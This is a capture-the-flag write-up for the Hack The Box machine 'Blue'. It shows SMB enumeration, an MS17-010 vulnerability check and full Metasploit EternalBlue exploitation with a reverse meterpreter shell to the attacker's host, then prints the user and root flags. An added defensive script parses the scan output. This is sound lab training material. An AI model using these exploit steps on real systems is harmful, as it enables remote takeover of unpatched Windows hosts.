Blue-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: nmap vulnerability script scanning, MS17-010 exploitation

Reference: https://gist.github.com/05t3/7d5925e6a4585abe2a48cc4a978aea87

0x01 Getting user access

1. Get the target machine's IP address: 10.10.10.40

2. Scan the target for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate 10000 10.10.10.40
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 22:25 CST
Warning: 10.10.10.40 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.40
Host is up (0.33s latency).
Not shown: 64752 closed tcp ports (reset), 774 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 31.78 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p 135,139,445 --min-rate=10000 -sC -sV 10.10.10.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 22:28 CST
Nmap scan report for 10.10.10.40
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-02-15T14:29:06+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1s, deviation: 3s, median: 0s
| smb2-time:
| date: 2024-02-15T14:29:02
|_ start_date: 2024-02-14T20:13:28
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.18 seconds

3. Enumerate the target's SMB service with enum4linux and see whether anything turns up

┌──(kali㉿offsec)-[~/Desktop]
└─$ enum4linux -a 10.10.10.40
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 15 22:32:00 2024

=========================================( Target Information )=========================================

Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

============================( Enumerating Workgroup/Domain on 10.10.10.40 )============================

[E] Can't find workgroup/domain

================================( Nbtstat Information for 10.10.10.40 )================================

Looking up status of 10.10.10.40
No reply from 10.10.10.40

====================================( Session Check on 10.10.10.40 )====================================

[+] Server 10.10.10.40 allows sessions using username '', password ''

=================================( Getting domain SID for 10.10.10.40 )=================================

do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED

[+] Can't determine if host is part of domain or part of a workgroup

===================================( OS information on 10.10.10.40 )===================================

[E] Can't get OS info with smbclient

[+] Got OS info for 10.10.10.40 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

========================================( Users on 10.10.10.40 )========================================

[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

==================================( Share Enumeration on 10.10.10.40 )==================================

do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.40

============================( Password Policy Information for 10.10.10.40 )============================

[E] Unexpected error from polenum:

[+] Attaching to 10.10.10.40 using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:10.10.10.40)

[+] Trying protocol 445/SMB...

[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

[E] Failed to get password policy with rpcclient

=======================================( Groups on 10.10.10.40 )=======================================

[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 10.10.10.40 via RID cycling (RIDS: 500-550,1000-1050) )===================

[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

================================( Getting printer info for 10.10.10.40 )================================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Thu Feb 15 22:33:19 2024

4. Possibly because of the tool, nothing was found, so continue enumerating the SMB service with smbclient

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -N -L //10.10.10.40

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

5. Some shared directories were found here, but after various attempts it turned out that the entry point is not among the shares shown, so the approach switches to looking directly for known vulnerabilities in the target host's OS build, by searching for the version string:

windows 7 professional 7601 service pack 1 vuln

6. A host running this build appears to be affected by MS17-010; use nmap's vulnerability script to check whether it is actually present

┌──(kali㉿offsec)-[~/Desktop]
└─$ nmap -p445 --script smb-vuln-ms17-010 10.10.10.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 22:55 CST
Nmap scan report for 10.10.10.40
Host is up (0.32s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 4.09 seconds
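Added example, not from the original write-up: a small Python triage script that parses the output of the nmap SMB scripts shown above (smb-security-mode, smb2-security-mode, smb-vuln-ms17-010) into ranked findings a defender would act on, with MS17-010 and SMBv1 exposure on top. The sample text is constructed from the scan output above; the "SMBv1 enabled" finding rests on the assumption that smb-security-mode only produces output when an SMBv1 dialect was negotiated.

```python
"""Triage nmap SMB script output into defender findings (added example).
SAMPLE is constructed from the -sC scan and the smb-vuln-ms17-010 check
shown in the write-up, with nmap's own indentation restored."""
import re

SAMPLE = """\
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""
SEVERITY = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}

def parse_scripts(text):
    """Group '|' lines by NSE script name -> {script: joined body text}."""
    scripts, current = {}, None
    for line in text.splitlines():
        head = re.match(r"^\|_?\s*([a-z][a-z0-9-]*):\s*$", line)
        if head:                                  # '| smb-security-mode:'
            current = head.group(1)
            scripts[current] = []
        elif current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_ ").strip())
    return {k: " ".join(v) for k, v in scripts.items()}

def triage(text):
    """Return (severity, message) findings, most severe first."""
    s, f = parse_scripts(text), []
    vuln = s.get("smb-vuln-ms17-010", "")
    if "State: VULNERABLE" in vuln:
        cves = sorted(set(re.findall(r"CVE-\d{4}-\d+", vuln)))
        f.append(("CRITICAL", "MS17-010 unpatched: " + ", ".join(cves)))
    sec1 = s.get("smb-security-mode", "")
    if sec1:  # assumption: this script only answers over an SMBv1 dialect
        f.append(("HIGH", "SMBv1 enabled (the dialect MS17-010 targets)"))
    if "message_signing: disabled" in sec1:
        f.append(("HIGH", "SMBv1 message signing disabled"))
    if "not required" in s.get("smb2-security-mode", ""):
        f.append(("MEDIUM", "SMB2 signing enabled but not required"))
    if "account_used: guest" in sec1:
        f.append(("MEDIUM", "guest/null session accepted"))
    return sorted(f, key=lambda x: SEVERITY[x[0]])
```

Feed it the raw `nmap -sC -sV` and `--script smb-vuln-ms17-010` output of a host and an empty list means none of these weaknesses was reported.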

7. It looks like the vulnerability is present, so go straight to exploiting it with msf

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole
Metasploit tip: Use the resource command to run commands from a file
msf6 > search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only af
fects Windows Server 2008 R2, Windows 7, Windows Embedded Standa
rd 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affect
s Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7
target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
chines.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.230.132 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.7:4444 -> 10.10.10.40:49158) at 2024-02-15 23:06:28 +0800
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > whoami
[-] Unknown command: whoami
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 616 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd ../../
cd ../../

C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B

Directory of C:\

14/07/2009 03:20 <DIR> PerfLogs
18/02/2022 15:02 <DIR> Program Files
14/07/2017 16:58 <DIR> Program Files (x86)
14/07/2017 13:48 <DIR> Share
21/07/2017 06:56 <DIR> Users
15/02/2024 15:05 <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 2,391,846,912 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B

Directory of C:\Users

21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,391,805,952 bytes free

C:\Users>cd haris
cd haris

C:\Users\haris>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B

Directory of C:\Users\haris

14/07/2017 13:45 <DIR> .
14/07/2017 13:45 <DIR> ..
15/07/2017 07:58 <DIR> Contacts
24/12/2017 02:23 <DIR> Desktop
15/07/2017 07:58 <DIR> Documents
15/07/2017 07:58 <DIR> Downloads
15/07/2017 07:58 <DIR> Favorites
15/07/2017 07:58 <DIR> Links
15/07/2017 07:58 <DIR> Music
15/07/2017 07:58 <DIR> Pictures
15/07/2017 07:58 <DIR> Saved Games
15/07/2017 07:58 <DIR> Searches
15/07/2017 07:58 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 2,391,805,952 bytes free

C:\Users\haris>cd Desktop
cd Desktop

C:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B

Directory of C:\Users\haris\Desktop

24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
14/02/2024 19:47 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 2,391,805,952 bytes free

C:\Users\haris\Desktop>

8. Now grab the user flag

C:\Users\haris\Desktop>type user.txt
type user.txt
3eeee7e7ef5db3ea8fd15f84a4b2aa6e

0x02 Getting system access

9. Since we already have SYSTEM, the highest privilege on the machine, go on and read the final flag

C:\Users\haris\Desktop>cd ../../
cd ../../

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B

Directory of C:\Users\Administrator\Desktop

24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
14/02/2024 19:47 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,391,805,952 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b79698d7b002d928d02539b3c8e3c02b

C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/51


https://sh1yan.top/2024/02/16/Blue-htb-writeup/
Author: shiyan
Published on: February 16, 2024